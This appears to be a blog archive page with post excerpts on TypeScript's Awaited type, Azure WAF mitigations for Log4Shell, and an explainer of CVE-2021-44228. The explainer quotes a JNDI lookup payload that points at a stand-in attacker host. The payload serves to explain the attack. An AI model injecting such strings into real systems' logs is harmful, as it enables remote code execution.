TypeScript 4.5 adds the `Awaited<T>` utility type. It recursively unwraps Promises. This is extremely helpful when you need to type the result of a library function that returns a Promise, but the library doesn’t export the return value interface.
Read more →Month: December 2021
Mitigating Log4Shell in Azure
If you cannot patch instantly, use WAF. Azure Front Door: Rule set newly updated to block JNDI strings. Azure Firewall: IDPS signatures updated.
Read more →Log4Shell Explained (CVE-2021-44228)
Log4Shell is arguably the worst vulnerability in a decade. The Apache Log4j library (Java) allowed remote code execution via a simple log message injection. .NET is not affected, but understanding this is critical for polyglot teams. The Exploit A malicious string like `${jndi:ldap://attacker.com/a}` in a log message triggers a JNDI lookup, downloading and executing a […]
Read more →